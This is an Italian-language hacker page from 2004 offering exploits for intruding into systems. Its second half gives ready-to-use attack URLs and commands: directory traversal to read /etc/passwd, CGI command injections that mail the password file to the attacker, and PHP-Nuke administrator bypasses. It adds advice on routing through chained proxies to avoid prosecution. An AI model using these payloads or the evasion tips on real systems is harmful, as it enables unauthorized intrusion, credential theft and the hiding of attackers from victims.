---> GoTo: English Version
Benvenuti nel sito ufficiale di Lord Menfi In questa sezione troverete tantissimi exploits e vi assicuro che molti di essi sono stati testati da me direttamente, quindi ancora funzionanti. Se non capite bene qualcosa riferitemelo in quanto ho tradotto dall'inglese e dall'americano i testi che spiegavano come usarli. In italia non ci sono siti internet che spieghino così dettagliatamente questo genere di cose quindi posso dire di essere il primo a inserire nelle mie pagine delle "Vere Tecniche di Intrusione" anzichè delle guide fatte male o da lamers. In questa sezione troverete TUTTO l'occorrente per penetrare nei sistemi informatici usando sia windows che Linux o Unix. Ora eccovi il tutto e ricordatevi: non fate casini su servers altrui ma solo sui vostri e ricordate che io non sono responsabile di quello che voi farete con l'ausilio dei mezzi messivi a disposizione. Ultimo Aggiornamento: 10 Marzo 2004 ATTENZIONE: Certi files necessitano di essere compilati. Clicca qui per sapere come farlo. Per qualunque evenienza Contattatemi (al posto dell' [at] mettete @, lo faccio per i web spider, quelli che cercano nei siti internet delle e-mail per poi spammare. Diffondete anche voi questo metodo! Dite NO allo spam!) |
Exploits inseriti il 10 Marzo 2004
|
PWebServer exploit PWebServer versione 0.3.3 soffre di un attacco trasversale contro le cartele che permette ad un attaccante di accedere a qualsiasi file fuori dal webroot Exploit : |
|
Haegemonia 1.07 and below DoS exploit Haegemonia è stato aggiornato per supportare altri giochi da Desert Rats che non sono ancora stati rilasciati ma che hanno sempre le stesse vulnerabilità Exploit : |
|
Red Faction 1.20 and below exploit Exploit per Red Faction versioni 1.20 e precedenti che possono avere un buffer overflow dalla parte del client Exploit : |
|
SHOUTcast 1.9.2 exploit Exploit da remoto SHOUTcast versione 1.9.2 con codice di retroconnessione. Scritto per Slackware 8.1, 9.0, 9.1, e RedHat 7.2 Exploit : |
|
GWeb HTTP server 0.6 exploit GWeb HTTP server versione 0.6 potrebbe avere un exploit che permette un attacco trasversale alle cartelle che permette all' attaccante di accede ai files fuori dal webroot Exploit : |
Exploits inseriti il 25 Febbraio 2004
Chaser exploit Exploit ancora da testare per Chaser 1.50 e precedenti Exploit : Download versione Client ( chaser-client.zip ) Download versione Server ( chasercrash.zip )
|
|
JavaScript Inject exploit C'è un modo per iniettare a javascript un url nell' history file di Internet Explorer che causa un salto del sito che si stà attaccando quando l'utente preme il pulsante 'indietro'. Un attaccante potrebbe usare questo metodo per leggere i coockies, i files locali e per eseguire programmi se IE sta girando come amministratore (administrator). Exploit : |
ReviewPost PHP Pro Multi SQL exploit Vulnerabilità multipla iniezione SQL trovata in ReviewPost PHP Pro Exploit : |
|
VServer Exploit Exploit locale che penetra in un vserver e poi permette di ottenere root permettendo di sfruttare chmod ( il comando per cambiare i permessi in linux ) 000 /vservers. Questa è la versione modificata dell'exploit chroot-again. Testato su linux 2.4.24 e vserver 1.24. Questo problema è stato risolto con l'uscita di vserver 1.25 Exploit : |
|
Open Journal 2.5 exploit Le versioni 2.5 e precedenti di Open Journal Blog danno priorità da proprietario a chi tenta di aggiungere un utente nel sistema Exploit : |
|
PalmOS httpd exploit Esiste un bug nel demone di http (httpd) nei PalmOS che causa un crash e un "Errore Fatale". Nel file di testo è anche inserito il sorgente dell' exploit Exploit : |
TrackMania exploit Il server del gioco TrackMania che è in ascolto sulla porta 2350 di TCP può essere crashato quando dei dati vengono mandati come risultato di un Denial Of Service Exploits : |
PHP Nuke 6.0 exploit Le versioni di PHPNuke 6.x e successive hanno un exploit php - based effettuabile da remoto che estrae la hash dell'amministratore usando un attacco SQL Injection Exploit : |
BosDates SQL Query exploit Questo exploit permette ad un attaccante remoto di influenzare le query SQL per ottenere importanti informazioni che potrebbero servire a ottenere un accesso non autorizzato al sistema remoto Exploit : |
RedHat Local Root Exploit Exploit per local root in XFree86. Della vulnerabilità se ne parla in questo testo ( è in inglese. Se avete bisogno mandatemi una mail e ve lo tradurrò. ) Testato su vari sistemi di Linux RedHat Exploit : |
Crob FTP DoS exploit La versione 2.5.2 di Crob FTP è vulnerabile ad attacchi denial of service Exploit : |
ASP Portal exploit ASP Portal soffre di vulnerabilità multiple che permettono di avere informazioni su autenticazioni e utenti, eseguire codici arbitrari da remoto, modificare le informazioni degli utenti e spoofing delle identità. E' incluso l'exploit Cookie Hijacking Exploit : |
AllMy_vari-tipi_ exploits AllMyVisitors, AllMyLinks and AllMyGuests sono affetti da una vulnerabilità di iniezione di codice che permette all'attaccante remoto di eseguire comandi arbitrari sul server Exploits : |
Robot FTP exploit Le versioni 1.0 e 2.0beta di Robot FTP hanno una vunerabilità di buffer overflow quando si sta takkando un utente Exploit : |
APC SmartSwitch exploit I prodotti APC SmartSwitch e UPS usano una carta di gestione HTTP/SNMP che ha uno strumento per le password in una backdoor. Testato su: SmartUPS 3000RM con AP9606 AOS v3.2.1 e SmartUPS App v3.2.6, MasterSwitch AP9212 con AP9606 AOS v3.0.3 e MasterSwitch App v2.2.0 Exploit : |
KarjaSoft Sami HTTP exploit Una specifica richiesta HTTP GET che contiene oltre 4096 bytes causerà un crash del server KarjaSoft Sami. Versioni affette: 1.0.4, forse anche quelle precedenti Exploit : |
Exploits inseriti il 19 Febbraio 2004
(Exploits Generali)
Exploits Visualizzazione Files&Cartelle
|
Problema Standard nei moduli statistici perl - file:
hsx.cgi, lo script non filtra../ and %00. Attraverso questo bug, puoi
vedere da remoto i files del sistema e vedere le cartelle contenute
in esso. ../ - directory superiore, %00 simbolo esadecimale ( questo
serve comefine linea ).
Exploit: by MC GaN of NerF security gr0up (Russia) - www.nerf.f2s.com |
|
Prelevare files con telnet Exploit: telnet target.machine.com 80 GET /cfdocs/expelval/openfile.cfm HTTP/1.0 |
|
Usare lynx per prelevare files con un URL Malformattato Exploit: lynx http://victim.com/scripts/convert.bas?../../etc/passwd oppure lynx http://www.host.com/cgi-bin/php.cgi?/etc/passwd
Per eseguire un finger bisogna, invece, scrivere: lynx http://www.host.com/cgi-bin/finger?@localhost |
Nome : Commerce.cgi
Directory Traversale Informazioni : Commerce.cgi può avere il tuo store's catalog su e lo sta facendo andare nel web da poche ore. Il Store Manager (facile da usare) ti farà sempre aggiungere e rimuovere prodotti dal tuo carrello dal tuo browser web. Il bello è che è gratis e vulnerabile! Problema: Aggiungendo la stringa "/../%00" davanti all'indirizzo della pagina web, i documenti abiliteranno ad un attaccante a vedere tutti i files sul server. Exploit: lynx http://VULNERABLE.com/cgi/commerce.cgi?page=../../../../etc/hosts%00index.html oppure: lynx http://www.VULNERABLE.com/cgi-bin/store.cgi?StartID=../etc/hosts%00.html |
Exploit: http://www.phpphotoalbum.com/products/phpPhotoAlbum/explorer.php?folder=../../../../../../../etc/ Synnergy Networks
-------------------------------------------------------- |
Nome : SWSoft ASPSeek
s.cgi script "show files" Vulnerability. Problema: Aggiungendo la stringa "/../../../../" ad un URL un attaccante può vedere qualunque file sul server e anche le cartelle. Exploit: lynx http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00 (Testato su Server: Apache/1.3.9 (Unix) PHP/4.0.3pl1 FrontPage/4.0.4.3) |
Nome : ikonboard Problema: $inhelpon = $query -> param('helpon'); Exploit: lynx http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00 |
Nome: mini-sql v 2.0.10.1
Exploit: http://www.victim.org/cgi-bin/w3-msql/cartella_protetta/file_privato Nota: in questo caso, l'intruso dovrà già conoscere la struttura delle cartele del sistema. Altrimenti dovrà fare: http://www.victim.org/cgi-bin/w3-msql/catella_protetta/.htpasswd E infine dovrà usare un password cracker come John The Ripper
per decriptare la password DES3 . |
Exploits Esecuzione di Comandi:
Exploit: lynx www.host.com/cgi-bin/excite;IFS="$";/bin/cat /etc/passwd|mail latuamail@tuoserver.xxx Nota: è meglio se questa mail tu te la sia procurata attraverso web passando prima da un proxy server (o più di uno) e ogni volta che vi accederai è meglio se passi da altri proxy ancora in modo da non lasciare tracce al tuo server in quanto quello attaccato potrebbe richiedergli di dare i tuoi dati per una denuncia (la tua mail rimane nei log di sistema) |
BizDBè un'integrazione dei database web che
usano degli script CGI in perl . Uno degli script, bizdb-search.cgi, può far passare una variabile contenente una chiamata non trovata open() e può far eseguire comandi con il provilegio del webserver. La variabile è dbname, e se viene passata con comandi dalla shell, questi potranno essere eseguiti.. Purtroppo non si può Exploitare da browser, ma dovremo usare netcat o programmi simili. Exploit: netcat server_usato_come_target 80 |
Exploit:
->Vedere il file passwd Oppure: http://www.htdig.org/cgi-bin/htsearch?exclude=%60/etc/passwd%60 ->Vedere il contenuto di una cartella ->Aggiungere un user ->Cambiare UID a 0 al tuo accaunt ->E se proprio vuoi la password di root... P.s.: Dopo aver trovato il file shadow
dovrai crackarlo con un password cracker come John The Ripper |
Nome : HIS Auktion 1.62: "show
files" vulnurability. -------auktion.pl------- Exploit: lynx http://www.victim.com/cgi-bin/auktion.pl?menue=/bin/id |
telnet macchina.target.it 80
GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5tuo_indirizzo\@tuocomputer.it\ P.s.: E' molto rischioso fare un'operazione del genere quindi come già detto in precedenza: è meglio se questa mail tu te la sia procurata attraverso
web passando prima da un proxy server (o più di uno) e ogni
volta che vi accederai è meglio se passi da altri proxy ancora
in modo da non lasciare tracce al tuo server in quanto quello attaccato
potrebbe richiedergli di dare i tuoi dati per una denuncia (la tua
mail rimane nei log di sistema) |
Exploit: http://lamer-host.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd Tutte le distribuzioni Linux S.u.S.E. 5.1 e 5.2 (e forse anche quelle
più vecchie) |
Exploit: (questo è un po' vecchiotto... Del '97!) utente@tuashelllinux# telnet www.xxxx.net 80 Trying 200.xx.xx.xx... Oppure: utente@tuashelllinux# lynx http://www.host.org/cgi-bin/htmlscript?../../../../etc/passwd |
php-nuke bug by Starman_Jones 22/08/00
Recentemente c'è stata la scoperta di un bug riguardante il validamento dell'accesso che esiste in PHP-nuke Web Portal System. Con questo bug un user qualunque può riuscire ad avere accessi privilegiati da amministratore. Exploit 1:
L'esempio appena descritto ti fa entrare come amministratore ma non
puoi far nulla con solo quell' URL. Quando clicki qualcosa nel pannello
dell'amministratore ti vengono richiesti nome utente e password. Starman_Jones
ha trovato il modo di bypassare questo problema Exploit 2: L'esempio qui sopra ti fa postare un topic nella pagina principale del sito come se fossi l'amministratore. Ma non è finita: si possono anche scrivere tag html oltre al topic. Per separare il testo anzichè usare gli spazi devi scrivere "%20" senza i doppi apici (" e "). Oltretutto potresti anche scrivere dei tag html che fanno un redirect ad altre pagine. Comunque in teoria potresti fare tutto quello che vuoi, a seconda delle tue idee( è pur sempre HTML, no?!). Puoi editare l'account dell'amministratore facendo così: Exploit 3: Con &op= tutto quello che è nel pannello dell'amministratoreviene sbloccato e potrai quindi controllare tutto ciò che vuoi. Non approfondisco ulteriormente questo testo in quanto le cose più importanti le ho dette e ormai dovresti avere accesso privilegato a tutto il sito.
Puoi copiare questo testo e metterlo su qualunque sito basta che dici che io l'ho tradotto e il proprietario è Starman_Jones. Tradotto e rielaborato da Lord Menfi Copyright Starman_Jones |